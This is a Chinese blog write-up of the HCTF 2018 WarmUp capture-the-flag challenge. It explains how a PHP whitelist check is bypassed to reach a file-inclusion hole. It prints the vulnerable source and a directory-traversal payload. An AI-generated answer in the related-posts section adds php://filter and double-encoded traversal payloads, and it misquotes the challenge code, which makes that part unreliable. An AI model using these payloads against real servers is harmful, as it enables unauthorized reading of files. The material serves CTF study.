[HCTF 2018]WarmUp

最新推荐文章于 2025-03-07 15:37:51 发布
最新推荐文章于 2025-03-07 15:37:51 发布
阅读量552 收藏
点赞数 1
文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_63548648/article/details/128067255
版权
这篇文章讲述了在HCTF2018 WarmUp挑战中,如何通过分析PHP代码逻辑,利用字符串操作绕过文件包含限制,找到flag的过程。关键在于理解`checkFile`函数的白名单策略,并巧妙构造URL参数来包含目标文件。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

[HCTF 2018]WarmUp

题目开头是一个滑稽表情  没有任何提示。所以先看下源代码。

给了个提示  source.php

进去后发现了源码。

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

拿到源码  就开始分析源码了。

 解题的关键就是这个include  文件包含。根据代码分析可以得出。

empty  是判断file是否为空

is_string是判断file是否为字符串类型

checkFile是类中得一个函数。

所以只要empty返回true,is_string返回true,checkFile返回true,就可以进行文件包含。

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];            
                //给了一个数组。hint.php里提示了flag在ffffllllaaaagggg里
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }//isset是判断page是否为空。由于传进来的page为一个字符串且不为空,所以返回false.

            if (in_array($page, $whitelist)) {
                return true;
            }/*in_array的意思是判断page里是否包含白名单里的内容 例如source.php  hint.php。
              就是page=source.php或者hint.php才行.所以最后返回了false。*/

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );/*这里mb_substr 是个截断,返回0到mb_strpos之间的内容,而mb_strpos 则是查找第一次出现的位置,所以基本可以理解为获取page 两个?之间的字符串,也就是获取file两个?之间的字符串,放到url中就是http://ip/?file=ddd?中的file=ddd*/
            
            if (in_array($_page, $whitelist)) {
                return true;
            }
        /*经过上面的截断代码,page=source.php  所以返回true ,文件可以得到包含,结束,下面的代码就不用在执行了*/
            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

return 的含义是返回一个东西,但是还有一个含义就是执行的时候代表着函数结束,在其下面的代码不在继续执行。

所以开始构造playload

index.php?file=source.php?../../../../../ffffllllaaaagggg

 ../的意思是返回上一目录。

为什么这样用呢,就是因为不知道flag在当前目录下还是在根目录下。

ke1nys
关注
02 [HCTF 2018]WarmUp
weixin_60937978的博客
04-23 3178
(修改网页, 访问source.php?file=1 访问 hint.php
[原题复现]HCTF 2018 Warmup
笑花大王
02-05 3089
HCTF 2018 Warmup 原题复现:https://gitee.com/xiaohua1998/hctf_2018_warmup 考察知识点:文件包含漏洞(phpmyadmin 4.8.1任意文件包含) 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用协会内部的CTF训练平台找到此题 过程 访问页面查看源码发现注释里面的内容访问它 访...
HCTF 2018WarmUp
Lixunzhe0112的博客
01-17 1731
原理如下:在我们将参数传给file时,服务器端会自动进行一次url解码,然后这里还有个urldecode再进行一次解码。_REQUEST[‘file’])&& emmm::checkFile($_REQUEST[‘file’]三个条件同时为真,才会包含我们传入的file。/flag.php’)和include(‘…所以:/var/www/flag.php 和…/var/www/flag.php是一个文件,上层没有了。说明flag.php在 /var/html类似目录中,只有两层,var为最上层了。
BUUCTF [HCTF 2018]WarmUp
m0_70764544的博客
03-07 234
我们拿到这个题,首先引入眼帘的是一个大大的笑脸,我们查看源代码去寻找一些有用的东西,我们在注释里面发现一个souce.php,所以我们打开,就是一长串php代码。让page不为空并且是字符串,这里的page也就是我们上面分析那段代码的file。这一段的意思就是传入一个变量file不为空并且是字符串就行,就能返回true。所以我们主要的是需要让上面的代码满足checkFile的条件返回true。根目录,而我们现在的路径为/var/www/html/hint.php。我们发现还有一个函数没用上,
HCTF 2018-warmup
m0_73303597的博客
12-07 493
自用
[HCTF 2018] WarmUp
kuller_Yan的博客
05-17 607
[HCTF 2018]WarmUp wp-------Kuller_Yan 首先我们访问题目url 可以看到一个图片,查看源码之后可以发现source.php文件 访问source.php可以看到一串代码,便可以确定,php代码审计,查看所给代码,分析出,一开始,给出白名单 然后是一个判断,判断page中是否包含白名单,然后将page截取从0到‘?’ ,再进行一次白名单判断 然后对page进行url加密,再进行白名单判断。 所以构建paylodesource.php?file=source.php%2
BUUCTF[HCTF 2018]WarmUp 1
10-21
【知识点解析】 1. **源代码查看与漏洞分析**: 在CTF(Capture The Flag)竞赛中,查看源代码是获取服务器端脚本逻辑的重要手段。通过观察源代码,可以理解程序的运行机制、判断逻辑和潜在漏洞。...
[HCTF 2018]WarmUp1
qq_48008847的博客
07-16 635
题目打开如上,常规思路先F12看一下网页源码 看到有一个被注释掉的source.php 看一下这是个什么东东 发现是一串代码,下面来审计一下这段代码 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { //白名单列表 $whitelist = ["source"=&g...
buuctf [HCTF 2018]WarmUp 1 解题思路
2301_76899943的博客
05-13 957
flag.php,先检测flag.php能否包含,不能就包含…/flag.php,以此类推。,就在参数page的末尾加上?substr函数的意思就是截取字符串,截取从第0个字符串开始 长度为strpod函数给出的数字 的字符串。检查源代码可以看到有source.php的提示,那么直接打开source.php。这里要注意这个include函数,如果文件无法读取,会向后读取文件。只允许包含白名单的文件,有source.php和hint.php。(实力较弱,如有表述错误的,恳请大佬指点~~!
web | CTF】BUUCTF [HCTF 2018]WarmUp
weixin_46301214的博客
03-03 592
访问一下hint.php文件就告诉我们,flag在 ffffllllaaaagggg 这个文件里。hint.php 是必填的,然后重点来了,想要访问成其他文件,只需要继续拼接?拦截大概意思就是,我们输入:ffffllllaaaagggg。ffffllllaaaagggg == 数组里两个文件名吗?然后你会发现,这TM是五层目录啊,而且本地是无法复现出来的。发现文件,打开访问一下看看,发现是代码审计。这里经验灵感是 四个字,所以是四层目录。
[HCTF 2018]WarmUp 1
最新发布
04-01
<think>好的,我现在需要帮用户解决HCTF 2018 WarmUp题目的解题思路。首先,我应该先回忆一下这个题目的基本情况。根据用户提供的引用内容,这题可能涉及到Web安全方面的挑战,比如CTF题目常见的漏洞类型,比如文件包含、代码审计等。 用户提到参考站内引用中的第三部分是关于[HCTF 2018]WarmUp的解题思路,所以首先需要从这些信息中提取关键点。根据引用中的描述,解题思路可能涉及几个步骤:首先访问页面,查看源代码;然后发现提示,比如source.php;接着分析该文件的内容,寻找可能的漏洞点,比如文件包含或PHP伪协议利用。 接下来,我需要详细拆解每个可能的步骤。比如,第一步访问网站后,查看页面源代码,可能会发现注释中的提示,例如source.php文件。访问这个文件后,可能会得到PHP代码,这时候需要进行代码审计。代码中可能存在文件包含漏洞,比如使用include或require函数,并且参数未经过滤或过滤不严。 在代码审计过程中,需要关注如何绕过安全措施。例如,代码中可能检查参数是否在白名单中,或者是否以特定字符串开头。这时候可能要用到目录穿越,比如使用../../../../etc/passwd这样的路径,或者利用PHP伪协议如php://filter来读取源代码。 另外,可能还需要考虑服务器的文件结构,比如flag文件的位置,常见的如/flag,/var/www/html/flag.txt等。通过构造合适的payload,利用文件包含漏洞来读取这些文件。 还需要注意题目是否有其他陷阱,比如需要绕过strpos检查,或者利用二次编码来绕过过滤。例如,如果代码检查参数是否以某个字符串开头,可以通过编码绕过,比如使用%2566来代表f,因为服务器可能进行两次URL解码。 然后,总结解题步骤:查看源代码找到提示文件,审计代码找漏洞点,构造payload绕过过滤,读取flag文件。同时,要确保每一步都符合题目的具体设置,可能不同的题目会有不同的过滤方式,需要根据实际情况调整payload。 最后,生成相关问题,覆盖文件包含漏洞、PHP伪协议、代码审计等方面,帮助用户深入理解相关知识点。</think>### [HCTF 2018]WarmUp 解题思路 #### 1. 初始页面与源代码分析 - 访问题目地址后,页面显示一个卡通笑脸表情。 - **关键操作**:查看页面源代码,发现注释中提示 `source.php`,访问该路径获取服务器端PHP代码[^1]。 #### 2. 代码审计关键点 ```php <?php class emmm { public static function checkFile(&$page) { $whitelist = ["source" => "source.php", "hint" => "hint.php"]; if (!isset($page) || !is_string($page)) { echo "you can't see it"; return false; } if (in_array($page, $whitelist)) { return true; } $_page = mb_substr($page, 0, mb_strpos($page . '?', '?')); if (in_array($_page, $whitelist)) { return true; } $_page = urldecode($page); $_page = mb_substr($_page, 0, mb_strpos($_page . '?', '?')); if (in_array($_page, $whitelist)) { return true; } echo "you can't see it"; return false; } } if (empty($_REQUEST['file'])) { include 'hint.php'; } else { $file = $_REQUEST['file']; if (emmm::checkFile($file)) { include $file; } else { echo "you can't see it"; } } ``` - **漏洞点**:`include $file` 存在文件包含漏洞,但需通过 `checkFile()` 校验。 - **绕过逻辑**: 1. `$whitelist` 白名单仅允许 `source.php` 和 `hint.php`。 2. 利用 `mb_substr` 截取 `?` 前的路径,结合多次URL解码绕过检查。 #### 3. 构造Payload读取flag - **hint.php提示**:`flag not here, and flag in ffffllllaaaagggg`(暗示flag文件路径)。 - **Payload构造**: ```url file=source.php?/../../../../../ffffllllaaaagggg ``` - 原理:利用 `?` 截断路径检查,通过目录穿越访问根目录下的目标文件。 #### 4. 其他绕过方式 - **PHP伪协议**(若服务器允许): ```url file=php://filter/read=convert.base64-encode/resource=ffffllllaaaagggg ``` - **二次URL编码**(应对严格过滤): ```url file=source.php%253F/..%252F..%252F..%252F..%252F..%252Fffffllllaaaagggg ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值